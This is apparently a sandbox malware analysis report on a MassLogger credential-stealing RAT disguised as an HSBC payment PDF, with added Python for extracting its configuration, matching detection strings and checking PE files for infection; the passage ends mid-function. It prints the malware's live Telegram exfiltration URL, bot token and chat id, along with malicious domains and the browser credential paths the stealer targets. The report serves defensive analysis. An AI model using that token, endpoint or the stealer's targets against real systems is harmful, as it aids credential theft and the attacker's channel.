

Windows Analysis Report
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Overview

General Information

Sample name: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Analysis ID: 1572924
MD5: 4bd5ab8c1d6eb0d7b601863a74471cf3
SHA1: 660bd416b9570b16fa77e2e559989f8efb9fd8b4
SHA256: 0b3ad575168e0457905f19bb5304a8ea8cce461d7b1ebd0964d1171374271e47
Tags: exeuser-lowmal3

Detection

MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 4BD5AB8C1D6EB0D7B601863A74471CF3)
    • RegSvcs.exe (PID: 7188 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • armsvc.exe (PID: 1972 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 9244278F3A4B451378B09E3B314A4B1A)
  • alg.exe (PID: 6292 cmdline: C:\Windows\System32\alg.exe MD5: 2AF371D31DE2620D08F24582BCC94F36)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 5948 cmdline: C:\Windows\system32\AppVClient.exe MD5: FEBB8A1C8444E585D00E9798A241F535)
  • FXSSVC.exe (PID: 5776 cmdline: C:\Windows\system32\fxssvc.exe MD5: B19D2C88C8C42BA1F4C83060C439AAFE)
  • elevation_service.exe (PID: 6968 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: AB3EAE016DCC7F0026DB2D4EF2BCCB01)
  • maintenanceservice.exe (PID: 3712 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: E7E89E8BD2CB902CA372DA1022670BE2)
  • msdtc.exe (PID: 2300 cmdline: C:\Windows\System32\msdtc.exe MD5: AAA284FF086F56BEC322CDE13CE5989C)
  • PerceptionSimulationService.exe (PID: 5652 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: F3D51ACFF199999586D8F7FCE77371CB)
  • perfhost.exe (PID: 5448 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: A01D0D18438CEA05470B157B11E94B3F)
  • Locator.exe (PID: 2696 cmdline: C:\Windows\system32\locator.exe MD5: 27C76B862642ACB46AB7DEFBFD73BFA7)
  • snmptrap.exe (PID: 7248 cmdline: C:\Windows\System32\snmptrap.exe MD5: C3DD833FAFF8B6217772A5E66FF25F25)
  • Spectrum.exe (PID: 7280 cmdline: C:\Windows\system32\spectrum.exe MD5: 72181D2F9FF55560F9C4B3AB19C98A62)
  • ssh-agent.exe (PID: 7384 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 2DAADB2D9EE99D7F3C6EB0FA254025A1)
  • TieringEngineService.exe (PID: 7436 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 5E4593411714FE016FDCC665AFE5D552)
  • AgentService.exe (PID: 7480 cmdline: C:\Windows\system32\AgentService.exe MD5: 8311FBEB6995BA81570173720F2B188B)
  • vds.exe (PID: 7504 cmdline: C:\Windows\System32\vds.exe MD5: D2428B28D20D38757D35F80B6491A864)
  • wbengine.exe (PID: 7584 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 7FEABE370E82D30A720E4A9459EFC1EB)
  • cleanup

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}
MassLogger: {"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
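The two configuration lines above are the sandbox extractors' output from the memory of RegSvcs.exe (PID 7188; dump id 00000011 is process 17, the same process behind the Yara hits further down). RegSvcs.exe is started with the sample's own command line, which together with the "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures is consistent with the .NET payload being injected into that host process. The Python below is an added example, not Joe Sandbox code, that re-derives the same configuration from a raw dump: it pulls printable ASCII and UTF-16LE runs (a .NET process keeps its user strings in UTF-16LE, so an ASCII-only `strings` pass would miss the URL), matches the bot-token shape, and rebuilds the api.telegram.org endpoint. The token regex and the `chat_id=` parameter name are assumptions of the example; the dump is constructed inline and embeds the token from this report, and nothing is ever sent to Telegram.

```python
import re

# Printable runs, the way `strings -a` (ASCII) and `strings -el` (UTF-16LE) find them.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# Shape of a Telegram bot token (numeric bot id, colon, 35-character secret) and of
# the chat_id request parameter. Both patterns are assumptions of this example.
TOKEN_RE = re.compile(r"(\d{8,10}):([A-Za-z0-9_-]{35})")
CHAT_RE = re.compile(r"chat_id=(-?\d{5,20})")


def printable_strings(blob: bytes):
    """Yield (offset, encoding, text) for every ASCII and UTF-16LE run in blob."""
    for m in ASCII_RUN.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in WIDE_RUN.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16-le")


def extract_telegram_config(blob: bytes) -> dict:
    """Recover token, chat id and the sendMessage endpoint from a memory dump.
    Fields stay None when nothing matches. Never contacts Telegram."""
    cfg = {"token": None, "bot_id": None, "chat_id": None, "c2_url": None, "evidence": []}
    for off, enc, text in printable_strings(blob):
        m = TOKEN_RE.search(text)
        if m and cfg["token"] is None:
            cfg["token"] = m.group(0)
            cfg["bot_id"] = m.group(1)          # stable pivot: the bot's numeric id
            cfg["evidence"].append((off, enc, "token"))
        m = CHAT_RE.search(text)
        if m and cfg["chat_id"] is None:
            cfg["chat_id"] = m.group(1)
            cfg["evidence"].append((off, enc, "chat_id"))
    if cfg["token"]:
        cfg["c2_url"] = f"https://api.telegram.org/bot{cfg['token']}/sendMessage"
    return cfg


def _wide(s: str) -> bytes:
    return s.encode("utf-16-le")


# Constructed stand-in for a RegSvcs.exe memory dump: the bot-API URL and the
# chat_id parameter as .NET user strings (UTF-16LE) between non-printable padding.
# The token and chat id are the ones the sandbox extracted from this sample.
SAMPLE_DUMP = (
    b"\x00" * 16
    + _wide("https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage")
    + b"\x00" * 8
    + _wide("chat_id=1613755033&text=")
    + b"\xff" * 4
)

if __name__ == "__main__":
    for key, value in extract_telegram_config(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

The numeric part before the colon is the bot id, which does not change when the attacker rotates the secret, so it is a cheap pivot for finding related samples and reports. The full token is the attacker's credential to the bot: record it as an indicator and report it to Telegram, but do not paste it into a browser or a script that talks to the API.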
Yara matches (memory dumps)

Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_MassLogger; Description: Yara detected MassLogger RAT; Author: Joe Security
Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_MassLogger; Description: Yara detected MassLogger RAT; Author: Joe Security
Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
(5 of 9 entries shown)
Yara matches (unpacked PEs)

Source: 17.2.RegSvcs.exe.400000.0.unpack
  Rule: JoeSecurity_MassLogger; Description: Yara detected MassLogger RAT; Author: Joe Security
Source: 17.2.RegSvcs.exe.400000.0.unpack
  Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 17.2.RegSvcs.exe.400000.0.unpack
  Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 17.2.RegSvcs.exe.400000.0.unpack
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown
  Strings:
  • 0xf173:$a1: get_encryptedPassword
  • 0xf49b:$a2: get_encryptedUsername
  • 0xef0e:$a3: get_timePasswordChanged
  • 0xf02f:$a4: get_passwordField
  • 0xf189:$a5: set_encryptedPassword
  • 0x10ae5:$a7: get_logins
  • 0x10796:$a8: GetOutlookPasswords
  • 0x10588:$a9: StartKeylogger
  • 0x10a35:$a10: KeyLoggerEventArgs
  • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
Source: 17.2.RegSvcs.exe.400000.0.unpack
  Rule: MAL_Envrial_Jan18_1; Description: Detects Encrial credential stealer malware; Author: Florian Roth
  Strings:
  • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
  • 0x14729:$a5: \Kometa\User Data\Default\Login Data
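Two third-party rules match the unpacked RegSvcs.exe image alongside Joe Security's own MassLogger rules. The credential-access method names ($a1 to $a11) are .NET metadata names and sit in the #Strings heap as ASCII; the browser profile paths in the Envrial rule are user strings and sit in the #US heap as UTF-16LE. A rule whose strings are not marked `wide` would miss the second set entirely. The Python below is an added example, not the sandbox's Yara engine and not either rule: it reproduces the `ascii wide` search and an "N of them" condition over a constructed image so the two cases can be compared, and shows the ASCII-only miss. The thresholds are assumptions of the example, not the real rules' conditions. One caveat for attribution: string rules written for one .NET stealer often fire on another because the credential-recovery code is shared, so the family call for this sample should rest on the MassLogger configuration extractor hit rather than on the Snake Keylogger rule.

```python
# Strings from the two third-party rule hits above: method names are stored as
# ASCII in the .NET #Strings heap; the profile paths are UTF-16LE user strings
# in the #US heap. The "needed" thresholds are this example's assumption.
RULES = {
    "snakekeylogger_strings": {
        "strings": ["get_encryptedPassword", "get_encryptedUsername",
                    "get_timePasswordChanged", "get_logins",
                    "GetOutlookPasswords", "StartKeylogger"],
        "needed": 3,
    },
    "envrial_strings": {
        "strings": ["\\Comodo\\Dragon\\User Data\\Default\\Login Data",
                    "\\Google\\Chrome\\User Data\\Default\\Login Data",
                    "\\Orbitum\\User Data\\Default\\Login Data",
                    "\\Kometa\\User Data\\Default\\Login Data"],
        "needed": 2,
    },
}


def scan(blob: bytes, strings, wide: bool = True):
    """Every occurrence of each string as ASCII and, if wide, as UTF-16LE: the
    equivalent of YARA's `ascii wide` modifiers. Returns sorted (offset, enc, s)."""
    hits = []
    for s in strings:
        needles = [("ascii", s.encode("ascii"))]
        if wide:
            needles.append(("wide", s.encode("utf-16-le")))
        for enc, needle in needles:
            pos = blob.find(needle)
            while pos != -1:
                hits.append((pos, enc, s))
                pos = blob.find(needle, pos + 1)
    return sorted(hits)


def evaluate(blob: bytes, rules=RULES, wide: bool = True):
    """Apply each rule's 'N of them' condition on distinct strings; returns
    {rule_name: hits} for the rules that fire."""
    fired = {}
    for name, rule in rules.items():
        hits = scan(blob, rule["strings"], wide)
        if len({s for _, _, s in hits}) >= rule["needed"]:
            fired[name] = hits
    return fired


def _wide(s: str) -> bytes:
    return s.encode("utf-16-le")


# Constructed stand-in for an unpacked .NET image: a #Strings heap holding ASCII
# method names, then a #US heap holding UTF-16LE paths.
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 62
    + b"#Strings\x00"
    + b"get_encryptedPassword\x00get_encryptedUsername\x00get_logins\x00StartKeylogger\x00"
    + b"#US\x00"
    + _wide("\\Google\\Chrome\\User Data\\Default\\Login Data") + b"\x00\x00"
    + _wide("\\Comodo\\Dragon\\User Data\\Default\\Login Data") + b"\x00\x00"
)

if __name__ == "__main__":
    print("ascii+wide fires:", sorted(evaluate(SAMPLE_IMAGE)))
    print("ascii only fires:", sorted(evaluate(SAMPLE_IMAGE, wide=False)))
    for off, enc, s in scan(SAMPLE_IMAGE, RULES["envrial_strings"]["strings"]):
        print(f"0x{off:x}: {enc}: {s}")
```

Offsets reported this way are positions in the unpacked image, which is how the 0xf173-style offsets above should be read; they are not file offsets of the dropped sample.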

                  System Summary

Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: (empty), CommandLine: (empty), CommandLine|base64offset|contains: (empty), Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: -1, ProcessCommandLine: (empty), ProcessId: 4, ProcessName: AppVStrm.sys
Note: the matched "process" is a kernel driver image recorded under PID 4 (System) with no command line and no parent, the same AppVStrm.sys entry that appears in the process tree above; the rule fired on the .sys extension of that record, not on the sample's own process, so it adds nothing to the verdict on its own.
Suricata IDS alerts

Timestamp                        SID      Sev  Classtype                                      Source IP        Src Port  Destination IP   Dst Port  Proto
2024-12-11T09:26:25.356895+0100  2051649  1    A Network Trojan was detected                  192.168.2.5      63116     1.1.1.1          53        UDP
2024-12-11T09:26:15.356321+0100  2051648  1    A Network Trojan was detected                  192.168.2.5      58130     1.1.1.1          53        UDP
2024-12-11T09:26:11.604324+0100  2018141  1    A Network Trojan was detected                  18.141.10.107    80        192.168.2.5      49706     TCP
2024-12-11T09:26:13.665364+0100  2018141  1    A Network Trojan was detected                  54.244.188.177   80        192.168.2.5      49708     TCP
2024-12-11T09:26:15.459262+0100  2018141  1    A Network Trojan was detected                  44.221.84.105    80        192.168.2.5      49710     TCP
2024-12-11T09:28:02.892689+0100  2018141  1    A Network Trojan was detected                  47.129.31.212    80        192.168.2.5      49946     TCP
2024-12-11T09:28:06.685072+0100  2018141  1    A Network Trojan was detected                  13.251.16.150    80        192.168.2.5      49952     TCP
2024-12-11T09:26:11.604324+0100  2037771  1    A Network Trojan was detected                  18.141.10.107    80        192.168.2.5      49706     TCP
2024-12-11T09:26:13.665364+0100  2037771  1    A Network Trojan was detected                  54.244.188.177   80        192.168.2.5      49708     TCP
2024-12-11T09:26:15.459262+0100  2037771  1    A Network Trojan was detected                  44.221.84.105    80        192.168.2.5      49710     TCP
2024-12-11T09:28:02.892689+0100  2037771  1    A Network Trojan was detected                  47.129.31.212    80        192.168.2.5      49946     TCP
2024-12-11T09:28:06.685072+0100  2037771  1    A Network Trojan was detected                  13.251.16.150    80        192.168.2.5      49952     TCP
2024-12-11T09:26:24.482915+0100  2057744  1    Malware Command and Control Activity Detected  192.168.2.5      49716     149.154.167.220  443       TCP
2024-12-11T09:26:14.947022+0100  2803274  2    Potentially Bad Traffic                        192.168.2.5      49709     193.122.6.168    80        TCP
2024-12-11T09:26:22.321994+0100  2803274  2    Potentially Bad Traffic                        192.168.2.5      49709     193.122.6.168    80        TCP
2024-12-11T09:26:12.597628+0100  2850851  1    Malware Command and Control Activity Detected  192.168.2.5      49707     18.141.10.107    80        TCP
2024-12-11T09:27:14.774279+0100  2850851  1    Malware Command and Control Activity Detected  192.168.2.5      49792     82.112.184.197   80        TCP

Notes: 192.168.2.5 is the analysis machine. Rows with source port 80 are server-to-client packets of the same HTTP sessions that the 4970x/4994x/4995x client ports belong to; SIDs 2018141 and 2037771 fired on the same five packets. The 2057744 alert is the TLS 1.2 connection to 149.154.167.220:443 listed under HTTPS traffic below, which is where the Telegram exfiltration goes.



                  AV Detection

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe; Avira: detected
Source: http://ww12.przvgke.biz/d; Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/; Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/iwsxa; Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/T; Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662ww99.przvgke.bizc; Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/7Ycs; Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662; Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/L; Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334; Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTZ8fHx8fHw2NzU5NGNhZTNm; Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/; Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU5NGNiMGMw; Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/snsobwmcccpnrm; Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
Source: RegSvcs.exe.7188.17.memstrmin; Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}
Source: ww99.przvgke.biz; Virustotal: Detection: 14%
Source: ww12.przvgke.biz; Virustotal: Detection: 15%
Source: http://82.112.184.197/dtxqcr; Virustotal: Detection: 7%
Source: http://ww99.przvgke.biz/; Virustotal: Detection: 14%
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe; ReversingLabs: Detection: 81%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe; Joe Sandbox ML: detected
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe; Joe Sandbox ML: detected
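Avira and the sandbox's ML model flag 31 third-party executables under Program Files (x86) (Java, Adobe ARM, Google Update, AutoIt3; a few paths are listed twice) as W32/Infector.Gen after the run, and the process tree shows one of them, the Adobe updater service armsvc.exe, executing afterwards. On a live host the reliable check is to compare each binary with its vendor's Authenticode signature or a known-good hash. For triage without that reference, the classic appended-infector pattern is an entry point that has moved into a trailing section, often writable and executable and with a name no linker would emit. The Python below is an added example, not the sandbox's or any scanner's logic: a stdlib PE section-table parser with that heuristic, plus a builder that constructs a minimal header-only PE32 image so the check can be run offline. The set of "standard" section names and the heuristic itself are assumptions of the example; expect benign hits on packed or unusually linked binaries, and treat a hit as a reason to verify the signature, not as a verdict.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names a stock MSVC/.NET/MinGW link produces; anything else is worth a look.
# This set is an assumption of the heuristic, not an authoritative list.
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".tls", ".bss", ".CRT", ".00cfg",
                  ".gfids", ".didat"}
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE32/PE32+ buffer."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
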